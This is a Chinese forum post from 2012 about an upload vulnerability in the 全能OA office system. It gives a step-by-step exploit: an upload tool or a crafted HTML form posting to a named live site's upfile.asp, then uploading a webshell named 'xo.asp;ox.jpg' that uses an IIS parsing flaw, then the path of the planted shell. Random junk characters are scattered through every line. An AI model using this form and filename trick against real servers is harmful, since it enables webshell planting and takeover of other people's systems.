全能OA办公系统 上传漏洞
7 P$ @8 b- U6 ]) f7 A- d) G
6 `! h# p. y2 [8 C: e系统介绍:; x) M/ G _1 E, X7 n0 Q
: h6 }6 W' L$ F
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。- Y+ |8 w8 N7 f4 e) ?
2 Y& q1 K) A5 _* [" v6 Y主要功能:
) c; K! k2 D7 H7 Q& g6 f2 b" D j公司通告 : z \ {3 U1 I- {
工作计划
. g+ B! ^# T0 d4 A& m G通讯助理
5 E$ X" M5 l3 x; \, Z6 | G* a客户资源 ; J" @1 ^4 K, ~2 p4 A6 }6 v" Z, `0 B1 b
我的公文
' d8 G# f4 b: Y: X9 B5 ]( f$ v公文传阅
0 W! W& l% t4 u2 u- |9 i公共资源
! W5 v6 X$ [% l资源预约
* R6 g/ o" w! D6 B: V' ], W今日考勤
2 a- g2 T0 n' S4 v3 @3 l0 F个人计划
$ X y6 O& B) Y3 V# k9 e) m0 _; e Q个人通讯录
1 u' Q& x0 f. M个人基本档案
% [- r7 ]3 Q/ s; q! X未读邮件 ; g% ?! P2 Y1 T+ U: v
发邮件 8 `" o- y( B6 g& |, b& W
收件夹 3 f3 Z3 l, ~" o9 y& E) S& X
寄件夹 0 ^# r! I3 e0 k; U
网络硬盘 7 P: Z% T* p$ N
网络会议 ; }0 r6 q' ]% T( a# l
网络调查
" M- G( k/ X3 K2 L9 _交流论坛# |4 n5 n* F; f
( U Q0 s- F* j0 f* m有兴趣测试的朋友可以下源码看看3 S8 [- M1 V$ i, a4 q- d/ V( j
5 W% L" S/ o: Z" l
源码下载:$ o! R. L6 P( H, w8 s' h; Z& |' I
8 w$ T5 | w8 z
http://www.mycodes.net/30/4750.htm$ [2 Y* `4 F) e; j# U9 N# ^
! C. O; e* g' w/ j0 [, u' G j5 s
漏洞介绍:+ B& c% R3 g* z9 g
% i' n* A! d; U% I }' y) h. ~由upfile.asp上传文件漏洞引起2 S$ x) M: ]& w
1 M" h y* }, e( M1 P2 H
测试方法:/ ]' i: e7 ]7 r; B
2 ]8 @2 }/ Q* d# [使用名小子上传http://www.itlynn.com/upfile.asp即可
1 b" L* N/ Y0 ?% K% I0 t
. V8 ~3 T: v9 d( _. ~/ g- Q如果upfile.asp文件被删除不存在。
: k, @, J1 j# M4 O7 e1 _2 W9 T9 k1 u+ c6 U2 ]# |" L
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
8 R1 x: F- D/ l3 b# j5 c
/ R5 K9 `' z1 o* z' i如果存在那么将如下代码保存为upfile.html。3 I; a5 t0 u* B5 k2 F
# D3 e' Z" `* @然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
5 f# l$ l; P1 a6 v0 K3 `7 M7 {
- ^% m% u q) S0 ^. j 4 X, y1 t4 k& ^( D
* Y( V! ?% ?4 }2 _/ H. c# c7 X01 <table border='0' align="center" cellpadding="5">
9 V" Y7 _8 \" q! M: E3 e- }+ M8 S) e, A
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> $ X0 |% [9 R8 B0 g0 [* _; r
, l" z# L) s( d0 e03 <tr>
c/ [ z' a, O4 j# T$ T7 |9 p6 _0 E% ]6 ^$ L; r
04 <td>报错:</td> f( o+ t, C# N% o
1 J! T' e: ~+ ^" ?8 z
05 <td><input type='radio' name='errnumber' value='0'>
, { Q+ V: E p4 C: y$ y. n+ Y/ ?4 W, C
06 自动更名 # M! | Q- E5 b
8 v9 v8 G: j7 A! j% F
07 <input type='radio' name='errnumber' value='1' checked>
" Z$ R! }, I# |3 `" V: l- P* u( `* v+ h6 \
08 报错方式 8 g+ x5 k3 q5 ^: H+ l
0 s- T, q% @( H) {) b* N, {* ? @
09 <input type='radio' name='errnumber' value='2'>
' y7 U. a& s2 a. ~
2 k" i+ w6 W9 }# w* Q' `/ L. h10 直接覆盖</td> ) ~1 B. M, g2 i% U, D
2 J3 E+ l9 e" p$ C9 I6 M
11 </tr> ^& ^% v& O& V: Q3 E3 q
# b( f& }0 R6 R
12 <tr> ) ?6 g) i- M6 Y- i
. N1 p3 v2 D* f, P
13 <td>主题:</td> # X1 y1 Z6 `% @
( p' t) [4 f) k5 @14 <td><input type='text' name='filename' size='30'></td> ! T" s4 q/ I6 p% Y
4 G, C; e- R9 y8 y3 C) F15 </tr>
# P7 H2 ?% P7 I8 O
1 s+ P3 @0 }7 m& |. Y, G5 v& u/ t16 <tr> 8 u( D) b* k$ x5 c
: V, b- _- Z7 W" g! y: H
17 <td>文件:</td>
$ r, T* `5 ~3 t3 f. @
9 f0 X5 n2 o2 s( a* g) V R18 <td><input type="file"name="fruit"size="30"></td> S4 ^5 S+ B# F7 l& [& F; k
a5 s k8 j* Q5 d: Y1 |19 </tr>
& J( L( |) e7 ~, t: x
1 ]: v$ j2 z, U7 v8 M20 <tr> 7 O" ~( d8 t* ^$ f8 Y+ \* d
) X8 |! p6 K7 e" x; N21 <td valign='top'>简介:</td> # @* F" {2 i+ Q1 l6 y8 U, m7 X
: d4 }( X$ O9 S: s& Z/ \
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> ( F4 Y `% ?# k# S2 Y0 E
9 @3 T9 u5 l3 _
23 </tr>
' J$ d2 \ I" C9 L: Y ^8 Q4 g
8 C& C. \8 O+ v0 m* a1 [1 _ G24
; H+ o$ h& `: K6 w( {$ a/ ?, @
0 [5 u$ a* w1 r25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
L! |' H* ]* l; t9 z& _; p$ J; i3 z$ J' J# E P
26 </tr>
! c1 n+ `/ D" X$ H8 L C: `* Z- m8 H1 k. c
27 </form> 9 ? H d# O7 d) F0 B) `7 |2 S. L
8 {7 B/ H" e. W- g( U" _: H( W
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
. W/ r4 o3 w! Z4 U" ?' N6 A: X& ~
' E( F, h# [" Z# c% I$ S
' i- J5 E- p( _( ]上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg) X& [3 h( j4 }9 n0 A8 Y: o' Y2 i
& n2 b0 N9 k* D' Y此漏洞需要配合解析漏洞利用。- C% U/ @5 e5 [/ }: u) _9 T
0 X( v' m4 ~" s
|
发表于 2012-11-21 13:45:12
收藏
支持
反对